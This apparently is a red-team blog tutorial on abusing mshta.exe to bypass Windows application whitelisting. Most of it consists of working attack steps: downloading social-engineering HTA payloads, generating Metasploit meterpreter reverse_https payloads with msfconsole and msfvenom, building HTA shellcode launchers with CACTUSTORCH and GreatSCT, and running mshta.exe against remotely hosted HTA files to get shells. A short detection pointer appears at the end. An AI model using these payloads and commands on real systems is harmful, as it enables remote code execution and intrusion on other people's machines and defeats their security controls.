Application Whitelisting Bypass: mshta.exe

Background

It’s been difficult to determine exactly who found “mshta.exe” and when they found it. I sent out a tweet asking about this. It can be seen below.

Lesley is certainly right, it’s been awesome for bypassing application whitelisting if it isn’t blocked. Hopefully someone chimes in and tells us who found it originally. Until then, we’re going to give all the credit to Microsoft and people that developed “mshta.exe” based payloads.

What is “mshta.exe”?

Let’s play Casey Smith’s favorite video game, it’s called MSDN. I started off with a search for “mshta.exe” on Google which led me to this then I found this article on MSDN that explains what HTML Applications are. You can see the two articles below.

The key words are highlighted in red: “Microsoft HTML Application Host”. At this point, we begin to wonder what a “Microsoft HTML Application” is. Let’s go back to our favorite video game, MSDN, to learn more.

The above article states “HTAs are full fledged-applications”. That certainly sounds interesting. Let’s see if we can find some example documentation from Microsoft to weaponize this. I found the following article on technet.

I’m going to assume that means we have access to Windows Script Host (WSH) and VBScript within HTML applications. Let’s keep reading the article.

Wow that’s awesome, we can execute VBScript within an HTML application. Our limitations are the capabilities of the scripting languages available within HTML applications. The GUI aspects of this aren’t that important, however, later in this post I’ll demonstrate how to utilize Twitter’s bootstrap within an HTML application. You can also close the window itself so the user doesn’t see anything when delivering an HTML application via “mshta.exe”. Back to Microsoft’s documentation, I found a series of posts called “Creating your own HTAs”. Here’s a link to one of these articles, it can also be viewed below.

Microsoft gives us an example of how to create a function to query for processes via WMI. This should be enough for us to weaponize an “mshta.exe” payload if we read more about VBScript language capabilities. And that’s exactly what attackers have done. We’ll go over this in the next section. There’s still the question of what other scripting languages can be used within an HTML application, but I’ll leave that as a research exercise for the readers. Remember, documentation is your friend.

Tutorial

Here’s a list of various “mshta.exe” or “HTML Application” payloads I’m going to cover.

Manual

Bootstrap in an HTML Application

Download @t3ntman‘s “Browser-Check” HTML application here.

wget https://raw.githubusercontent.com/t3ntman/Social-Engineering-Payloads/master/Browser-Check/browsercheck.hta

Generate a powershell one line payload with Metasploit.

msfconsole

use exploit/multi/script/web_delivery

set LHOST <ip address>

set LPORT 443

set target 2

set payload windows/meterpreter/reverse_https

exploit -j

Copy and paste the powershell command into the “strArgs” variable in the Browser-Check HTML application. Run the HTML application on the target system.

mshta.exe https://blog.conscioushacker.io/browsercheck.hta


Thanks to @t3ntman for bootstrap in HTML Applications! Check out his social engineer payloads project here.

HTA Shellcode Launcher (CACTUSTORCH)

Download @vysecurity’s HTA Shellcode Launcher here.

wget https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta

Generate raw shellcode with Metasploit and base64 encode it.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.157.130 LPORT=443 -f raw > shellcode.bin

cat shellcode.bin |base64 -w 0

Copy and paste your shellcode into CACTUSTORCH.hta.

Run the payload on your target system. My target is a fresh install of Windows 10 Enterprise.

mshta.exe https://blog.conscioushacker.io/CACTUSTORCH.hta

That’s interesting to note, CACTUSTORCH needs the .NET Framework installed to work. That makes sense because it relies on James Foreshaw’s DotNetToJScript. Let’s install .NET Framework 3.5 and try executing our payload again.

 

CACTUSTORCH executed and injected into “rundll32.exe” as we expected. Let’s check metasploit for our shell.

Automated

MSBuild “Not Powershell” HTML Application (GreatSCT)

We’re going to use GreatSCT to generate a “mshta.exe” payload.

git clone https://github.com/GreatSCT/GreatSCT.git

cd GreatSCT

python3 ./gr8sct.py

Press any key to begin.

Select option number “one” (1) and press enter.

Configure any options as desired with “set”, i.e. “set 2 80” or “set ListenerPort 80”. Type “generate” and press enter.

Start your Metasploit listener. Host your payload on a web server and execute with “mshta.exe https://blog.conscioushacker.io/msbuild_npa.hta”. Wait for your shell. It’s important to note that this payload has sandbox detection. You can find the sandbox detection code here. It’s also shown below.

This payload also automatically closes the window of the HTML application. You can find the code to close the window of an HTML application here.

These are some neat tricks for operational “mshta.exe” payloads, thanks @TrustedSec. Keep it in your notes.

HTA Shellcode Launcher (GreatSCT)

We’re going to use GreatSCT to generate a “mshta.exe” payload.

git clone https://github.com/GreatSCT/GreatSCT.git

cd GreatSCT

python3 ./gr8sct.py

Press any key to begin.

Select option number “three” (3) and press enter.

Configure any options as desired with “set”, i.e. “set 2 80” or “set ListenerPort 80”. Please note that you can call the COM scriptlet backing the HTA whatever you want. By default, it’s called “README.txt” in GreatSCT. The default can be redefined in a configuration file. Type “generate” and press enter.

Host the hta and COM scriptlet on a web server. Execute the payload on the target system. In this case, I hosted the HTA and SCT on the same system as the metasploit listener for simplicity because I set the “HostedDomain” value to “http://192.168.157.130”.

mshta.exe http://192.168.157.130/HTAtoShell.hta

Let’s check Apache’s access log to see if “mshta.exe” grabs the HTA and SCT.

Check Metasploit for our shell.

Notes

These notes are other aspects of HTML applications that I recommend exploring. For example. the file extension does not matter. HTA files only require the “application/hta” MIME type to work.

Here’s another very interesting trick Casey mentions on twitter.

You can read more about this here. I created one of these and weaponized it, however, this blog post is not going to cover delivering HTML applications via “mht” files. You can also utilize James Foreshaw’s (@tiraniddoDotNetToJScript to create a pure JScript shellcode launcher without the need for a COM scriptlet. We (@t3ntman and I) have made a template for these payloads and found a bug in  DotNetToJScript in the process. James fixed the bug within an hour and now it works. We’ll be releasing that soon, stay tuned. Good luck in your “mshta.exe” adventures!

Detection

In cases where you cannot block “mshta.exe”, Keith (@kwm) from @redcanaryco shares insights on detecting malicious activity.

Credits

Leave a comment

Your email address will not be published. Required fields are marked *